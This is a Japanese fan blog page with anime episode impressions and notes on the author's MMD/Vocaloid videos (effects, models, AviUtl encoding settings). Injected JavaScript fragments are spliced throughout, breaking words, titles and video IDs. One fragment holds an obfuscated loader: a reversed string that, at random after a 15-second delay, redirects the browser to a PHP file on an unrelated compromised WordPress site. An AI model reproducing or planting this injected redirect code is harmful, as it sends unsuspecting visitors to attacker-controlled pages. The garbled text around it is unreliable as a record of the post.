カレンダー

2018年11月
« 2月  
 123
45678910
11121314151617
18192021222324
252627282930 

【アニメ感想】6/18~6/24の雑感

ネタバレあり



咲-Saki-阿知賀編 episodom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}de of sidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}de-A 第9局「最強」

[nicolink vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”so18101157″]

トキが主人公すぎる!!

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

この西をポンしたあとに、ツモられて、驚愕の表情とか、展開がよすぎる。

本当に照あらがおうと必死なトキに惹かれる。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

そんななか、ついに、照のダイナミックツモ!!

コークスクリューツモなのか!?

さすが咲といえますね。

イーピンがめっちゃまわってて、咲はこうだよねーと、おもわず、おもっちゃいました。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

まともに出番のない玄。

そして、このアングル。

咲ではよく使われるアングルだけど、いいねいいねー。最高だね~。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

この涙目一歩手前の表情もいいね。

Sじゃないけど、この表情にそそられる。

トキが差し込んだんだときも、一人、状況わかってなかったけど、そんな玄が可愛い。

応援してます。



アクセル・ワールド #10「Activation;出撃」

[nicolink vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”1339134284″]

無制限フィールドに入ってからのやり取りで、誰がハルユキに抱えてもらえるか言い争うのにによによしてました。

いやはや、やっぱり、ぷち修羅場いいですね。

ハカセくんの悲惨な扱いも良い感じ。

そんなわけで、黄の王が現れたところで引きでしたね。

また、しばらくはによによできそうにないけど、

熱い展開を期待していましょう。

基本、厨二な世界なのできっと熱くやってくれるでしょう。



モーレツ宇宙海賊 第24話「傷だらけの弁天」

[nicolink vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”1340243944″]

今回は超まぢな戦闘でしたね。

あっというまのAパート、そして、ぼろぼろになった弁天丸。

相手の弾幕につっこんでいって、敵の隙間をすり抜けるまで、超テンションあがりっぱなしでした。

そんでもって、クーリエの素顔がでましたね。

原作描写からすると、最初の頃のグリューエルみたいにきらきらしてるのかと

おもったけど、そうでもなかった。

これはこれでいいのかも。

そして、声のギャップはげしすぎる。

次回予告をみても、なんだか楽しげなので楽しみ。

オリジナル展開だけど、楽しいね。

投稿しました「【GUMI】ボカマス★ナイトフィーバー【替え歌】」

今回投稿した動画です。

[nicolink vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”sm17347238″]

ぼかます生をテーマに替え歌にしてみました。

超ローカルネタ。

恒例の映像でしようしたもの一覧

■使用したMME

・改変ディフュージョンフィルタ v0.4

・モーションブラーエフェクト Ver.2.0

・AutoLuminous Ver.2.0

 ライトとか、いろいろ光らせるため

・XDOF Ver.2.2

 カメラのピントみたいに、ピントがあっていないところをぼかします。

・SeriousShadom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der.fx v0.2

 しはすいさんから、このシェーダを使っているとのコメントをもらったので使ってみました。

 「PostAdultShadom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der.fx」とセットで使用しています。

 これは、モデルごとに割り当てが必要です。

 MMDを起動し直すと設定がなくなっているから、忘れずに毎回設定してます。

 設定が解除されるのは仕様なのだろうか。それとも、私だけ?

・PostAdultShadom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}der.fx v0.13

 ということでこちらをセットで使用。これはアクセサリで読み込むだけです。

・SSAO

 奥行きのある感じの質感?色調?な感じ?言葉でうまく説明できない。

■使用したモデル

・Lat式ミクぷちミク

・GUMIβ

・バケちは

・千早 ゴシックプリンセス

・五体合体グレートキサラギ

・DIVAっぽいMEIKO

・DIVA風ミク_ver.1.05α

・歌愛ユキ_n式ver1.03

・デフォ子(唄音ウタ)Ver.2.4a

■使用したアクセサリ類

・鉄塔ステージ ver.1.0

・イベントステージ ver.1.1

・天空セット(環境3.0)

■3DCG動画作成ツール

・MikuMikuDance Ver.7.39

■使用したモーション

・【MMD】DanceVidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deo ルカルカ★ナイトフィーバー【こずえ】

 dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}/*$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == "string") return $cFN$wEpyMrNXtezaeR2.list[n].split("").reverse().join("");return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=["\'php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deo.jp/watch/sm7821565″ target=”_blank”>http://www.nicovidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deo.jp/watch/sm7821565

 [nicolink vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”sm7821565″]

今回苦労したことは、エンコードするとものすごく汚くなるのでどうやって綺麗にするかでした。

1.5MBでエンコードしても、ものすごく汚かったです。

そのため、最初の方は、大人しめのステージにしてエンコードに優しくしてみたり

色々と試してみました。

結論としては、ビットレート1.5Mで色々試したけど納得できる画質にはなりませんでした。

ウィンドウを最大にしてみなければそこまでわからないですが、最後の方は、どうせローカルネタなんだから

多くの人がいるわけでもないからビットレート2Mにしちゃえ・・・

となってしましました。

何回もエンコードしたのは、勉強だと思っておくことにします。

何度も何度もエンコードしていたので、エンコードだけで10時間以上やってました。

aviutlの設定(MP4エンコードのためプラグイン使用)

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

H.264 Leverlは3.1のところを、今回はビットレート高めなので4.1にしてみました。

ビットレート1.5MBでH.264 Leverlは3.1だと、映像が汚すぎて話になりませんでした。

プリセットのロードはslowにしています。veryslowにすると一眠りできるくらい時間かかりました。

それでもそんなに映像は良くなかったこともあり、今回は、最後はslowでいいかと日和してしましした。

veryslowで数回やりましたが、さすがに試行するのに時間がかかり過ぎなので時間的にあきめました。

今回は3回エンコードする設定にしていたので、私のPCで1時間かかりました。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

AQのモードをAutoVAQにしましたが、そんなに変化なかった気がします。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

動きの予測は、Hadamard ESA(低速)という一番遅いやつを選択。少しでも画質を良くしようとチャレンジ。

サブピクセル動きを予測も11(Full RD)を選択。(一番いいやつ)

キーフレーム間隔の上限は600にしています。(60fpsの動画だったため)

fpsの10倍の値を入力するらしいです。

動画投稿「【KAIKO】きゅんっ!ヴァンパイアガール【カバー】」

今回は、お手伝いした動画をアップロードしました。

投稿動画はこちら。

[nicolink vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”sm17273089″]

コメントにも書いていますが、しやさんがKAIKOで「きゅんっ!ヴァンパイアガール」を歌わせていたのをみてお手伝い表明。

MMDでモーションが公開されているので、それをもとに動画を編集しました。

作成している途中でMMEがバージョンアップしていることに気づいたり

違うMMEを使ったほうが良さそうだったりしたので、いろいろと試しながら作成しました。

動画の最後に使用したものをクレジット表示しています。

以下の内容になります。

使用したもの(動画の最後にクレジット)

■使用したMME

 ・改変ディフュージョンフィルタ v0.4

  説明難しいけど、ちょっとぼやかして綺麗にみせる的な感じ?

 ・モーションブラーエフェクト Ver.2.0

  前につかっていたブラーよりもこっちのほうが綺麗にブラーがかかっていたので変更。

  古いMMEのバージョンではエラーになったのでMMEを最新化しました。

 ・お手軽にトーン補正フィルタ v0.6

 ・AutoLuminous Ver.2.0

 ・XDOF Ver.2.2

  カメラのようにピントのあわない背景をぼやかすものです。

・AdultShadom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}derS と S2 v0.14

  オープニングで暗いなか、指定部分を光らせてます。

■使用したモデル

 ・始音カイコv2 ホワイトブレザー

 ・らぶ式KAIKO

 ・KAIKO Ver3.1?

■使用したステージ

 ・WIM風ステージ

 ・バラド=ドゥーア

■使用したアクセサリ

 ・小悪魔セット(白)

■3DCG動画作成ツール

MikuMikuDance Ver.7.39

■VSQ配布元

【Vocaloid miki】きゅんっ!ヴァンパイアガール【カバー】

[nicolink vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”sm15251434″]

■モーション配布元

【Voc@loidM@ster祭り5】トリオdom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deきゅんパイア【MMDモーション配布】

[nicolink vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”sm16143151″]

【IA】THE IDOLM@STER「隣に…」フル版【VOCALOIDカバー】投稿しました

VOCALOID3のIAを購入したので早速歌ってもらいました。

メルトなど、過去に歌わせたものを歌わせて見ましたが、なかなかしっくりくるものがなく

結果的に、隣に・・・に落ち着きました。

こういう落ち着いた曲は声質的にも合いますね。

なかなか素直で使いやすい。

MMDモデルも可愛いですし、これから人気がでるのかな?

[nicolink vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”sm16850452″]

ボーカルは、「スグに使えるEQレシピ」という本を買ったので、そこにある設定を試して見ました。

使ったのは「やわらかめの女性ボーカルの設定」

この本は、私みたいなDAWよくわからない人にはいいかも

お値段1,900円なり。

【MEIKO】Dear【Project DIVA ドリーミーシアター 2nd】を投稿していました

去年のクリスマス前にPSPとDIVA2を購入しました。

そして、DearのPVが気に入ってPSP版の映像でニコニコ動画に投稿していました。

そして、今回は秋にドリーミーシアターがDIVA2対応版がでていたことを今更思い出して購入。

今度はドリーミーシアターの映像で作成しました。

ただし、私がもっているキャプチャ環境だとHD解像度ところか720すらNG,420という残念画質。

綺麗にキャプチャできる環境が欲しいですが、ボードがさせる空きが無いのでそれも難しいです。

(現在はUSB式の安いキャプチャソフト)

あとは、ちょっとミキシングで音量バランスを変えたり、細かい部分を修正しました。

そんなわけで、投稿した作品は以下のものになります。

あいかわらず伸びないけど、うれしいコメントもついていて、ほっこりしてます。

それに、自分で聞いててもMEIKOさんの歌声いいなーと自画自賛、、、いや、親ばか状態?

[nicolink vidom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}deoid=”sm16401243″]